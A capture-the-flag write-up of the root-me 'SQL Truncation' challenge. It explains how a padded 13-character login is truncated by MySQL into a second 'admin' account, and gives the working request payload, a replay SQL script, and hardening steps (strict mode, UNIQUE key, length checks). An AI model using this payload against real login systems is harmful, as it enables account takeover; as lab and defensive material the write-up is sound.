SQL truncation
root-me challenge: SQL Truncation: Gain access to the administration zone.
Trying to register with the login admin, the response leaks the table definition in an HTML comment:
```sql
<!--
CREATE TABLE IF NOT EXISTS user(
  id INT NOT NULL AUTO_INCREMENT,
  login VARCHAR(12),
  password CHAR(32),
  PRIMARY KEY (id));
-->
```
login is VARCHAR(12) and password is CHAR(32) (an MD5 hex digest). Using an SQL truncation attack, register a 13-character login: admin, seven spaces (URL-encoded as +), then one extra character. The duplicate check does not match the existing admin row because of the trailing a, the INSERT silently truncates the value to the 12 characters `admin       `, and the login comparison ignores trailing spaces, so the new row authenticates as admin with the chosen password:

```
login=admin+++++++a&password=admin123
```
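The same attack replayed directly against a MySQL/MariaDB server, as an added example (not part of the root-me challenge code). It assumes a scratch database you may create tables in, an existing admin row with the assumed password `secret`, and a PAD SPACE collation (utf8mb4_general_ci is set explicitly here because the MySQL 8 default utf8mb4_0900_ai_ci is NO PAD and would break the final step):

```sql
-- Added example, not the challenge's own code.
-- Non-strict mode: over-length strings are truncated with a warning
-- instead of being rejected (MySQL >= 5.7 ships strict mode on by default).
SET SESSION sql_mode = '';

CREATE TABLE IF NOT EXISTS user(
  id INT NOT NULL AUTO_INCREMENT,
  login VARCHAR(12) CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci,  -- PAD SPACE (assumption)
  password CHAR(32),
  PRIMARY KEY (id));

-- Legitimate admin account; password 'secret' is an assumption.
INSERT INTO user (login, password) VALUES ('admin', MD5('secret'));

-- Registration's duplicate check: the 13-char login is not equal to 'admin'
-- because the trailing 'a' is compared, so the check passes (returns 0).
SELECT COUNT(*) AS existing FROM user WHERE login = 'admin       a';

-- The INSERT truncates 'admin       a' to the 12 chars 'admin       '.
INSERT INTO user (login, password) VALUES ('admin       a', MD5('admin123'));
SHOW WARNINGS;  -- 1265: Data truncated for column 'login' at row 1

-- Login check: under a PAD SPACE collation trailing spaces are ignored, so
-- 'admin       ' = 'admin' and the attacker's row matches with admin123.
SELECT id, login, LENGTH(login) AS stored_len
FROM user
WHERE login = 'admin' AND password = MD5('admin123');
```

Two conditions must both hold for the bypass: sql_mode without STRICT_TRANS_TABLES/STRICT_ALL_TABLES (so the INSERT truncates instead of failing), and a PAD SPACE collation on login (so the truncated value compares equal to admin). If either is missing, the final SELECT returns no row.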
Techniques

SQL truncation abuses a mismatch between how the application checks a value and how the database stores it. The registration code checks `login = 'admin       a'` (no match, so the account is "new"), then inserts; in non-strict sql_mode MySQL cuts the 13-character string down to the column's 12 characters with only a warning. On login, `login = 'admin'` matches the truncated row because PAD SPACE collations ignore trailing spaces when comparing. The same trick works for any column whose declared length the application never enforces; pad to the column length and append one character.

Counter moves

Server-side validation and least privilege are what these reduce to: reject or exactly-length-check the login before it reaches the database, run MySQL with STRICT_TRANS_TABLES or STRICT_ALL_TABLES so an over-length value is an error (1406 Data too long) rather than a silent truncation, and put a UNIQUE key on login so a second admin row cannot exist at all. Seen from the other side, this belongs in the blue-team notes on the application layer: a truncation warning in the database log during registration is the detection signal.
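The hardened table and session settings, as an added example (not the challenge's code); the same attacker INSERT now fails outright. It assumes a scratch database and the same assumed admin password as above:

```sql
-- Added example, not the challenge's own code.
-- Strict mode turns truncation into an error for every storage engine.
SET SESSION sql_mode = 'STRICT_ALL_TABLES';

CREATE TABLE IF NOT EXISTS user(
  id INT NOT NULL AUTO_INCREMENT,
  login VARCHAR(12) NOT NULL,
  password CHAR(32) NOT NULL,
  PRIMARY KEY (id),
  UNIQUE KEY uq_login (login));   -- one row per login, enforced by the database

INSERT INTO user (login, password) VALUES ('admin', MD5('secret'));  -- assumed password

-- 13 chars into VARCHAR(12): ERROR 1406 (22001) Data too long for column 'login'
INSERT INTO user (login, password) VALUES ('admin       a', MD5('admin123'));

-- Even a hand-padded 12-char value is stopped: under a PAD SPACE collation
-- it is a duplicate of 'admin' (ERROR 1062), and under a NO PAD collation it
-- is stored as a distinct login that no longer compares equal to 'admin'.
INSERT INTO user (login, password) VALUES ('admin       ', MD5('admin123'));

-- Confirm that only the legitimate row can authenticate as admin.
SELECT id, login FROM user WHERE login = 'admin' AND password = MD5('secret');
```

Strict mode is a session or global variable, so check `SELECT @@sql_mode;` on the actual server rather than trusting the version default; a legacy my.cnf can still clear it. The application should also enforce the 12-character limit itself so the request is rejected before any query runs.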